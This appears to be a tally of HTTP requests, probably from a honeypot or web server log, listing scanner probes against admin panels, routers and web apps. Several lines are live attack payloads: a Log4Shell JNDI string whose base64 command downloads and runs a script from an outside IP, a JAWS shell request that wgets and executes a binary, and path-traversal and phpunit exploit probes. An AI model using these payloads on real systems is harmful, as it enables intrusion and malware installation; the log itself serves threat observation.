1	GET	`/loginMsg.js`	HTTP/1.1
2	GET	`/login`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/mgmt/login?dest=%2Fmgmt%2Fgui%3Fp%3Dhome&reason=&username=`	HTTP/1.1
1	GET	`/netmri/config/userAdmin/login.tdf`	HTTP/1.1
1	GET	`/properties/configuration.php?tab=Status`	HTTP/1.1
1	GET	`/properties/description.dhtml`	HTTP/1.1
1	GET	`/ptz.htm`	HTTP/1.1
1	GET	`/qeSj0rzuLdQ3.asp`	HTTP/1.1
1	GET	`/qeSj0rzuLdQ3.cfm`	HTTP/1.1
1	GET	`/qeSj0rzuLdQ3.cgi`	HTTP/1.1
1	GET	`/qeSj0rzuLdQ3.html`	HTTP/1.1
1	GET	`/qeSj0rzuLdQ3.inc`	HTTP/1.1
1	GET	`/qeSj0rzuLdQ3.php3`	HTTP/1.1
1	GET	`/qeSj0rzuLdQ3.php`	HTTP/1.1
1	GET	`/qeSj0rzuLdQ3.pl`	HTTP/1.1
1	GET	`/qeSj0rzuLdQ3.sh`	HTTP/1.1
1	GET	`/qeSj0rzuLdQ3.shtml`	HTTP/1.1
3	GET	`/robots.txt`	HTTP/1.1
1	GET	`/scgi-bin/platform.cgi`	HTTP/1.1
1	GET	`/scripts/qeSj0rzuLdQ3.asp`	HTTP/1.1
1	GET	`/scripts/qeSj0rzuLdQ3.cfm`	HTTP/1.1
1	GET	`/scripts/qeSj0rzuLdQ3.cgi`	HTTP/1.1
1	GET	`/scripts/qeSj0rzuLdQ3.html`	HTTP/1.1
1	GET	`/scripts/qeSj0rzuLdQ3.inc`	HTTP/1.1
1	GET	`/scripts/qeSj0rzuLdQ3.php3`	HTTP/1.1
1	GET	`/scripts/qeSj0rzuLdQ3.php`	HTTP/1.1
1	GET	`/scripts/qeSj0rzuLdQ3.pl`	HTTP/1.1
1	GET	`/scripts/qeSj0rzuLdQ3.sh`	HTTP/1.1
1	GET	`/scripts/qeSj0rzuLdQ3.shtml`	HTTP/1.1
1	GET	`/server-info`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws`	HTTP/1.1
3	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/solr/admin/collections?action=t(%27$%7B$%7Benv:BARFOO:-j%7Dndi$%7Benv:BARFOO:-:%7D$%7Benv:BARFOO:-l%7Ddap$%7Benv:BARFOO:-:%7D//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE5Mi45NS41MC4yMjgvYmlucy5zaCAtbyBiaW5zLnNoOyB3Z2V0IGh0dHA6Ly8xOTIuOTUuNTAuMjI4L2JpbnMuc2g7IGNobW9kIDc3NyBiaW5zLnNoOyBzaCBiaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYyA=%7D%27)&wt=json`	HTTP/1.1
1	GET	`/start.js`	HTTP/1.1
1	GET	`/sws/data/sws_data.js`	HTTP/1.1
1	GET	`/this_server/all_settings.shtml`	HTTP/1.1
1	GET	`/tmui/`	HTTP/1.1
1	GET	`/upnp/BasicDevice.xml`	HTTP/1.1
1	GET	`/wavemaster.internal`	HTTP/1.1
1	GET	`/wcd/system.xml`	HTTP/1.1
1	GET	`/xmldata?item=All`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
2	POST	`/HNAP1/`	HTTP/1.0
3	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	VYZMFY	`/`	HTTP/1.1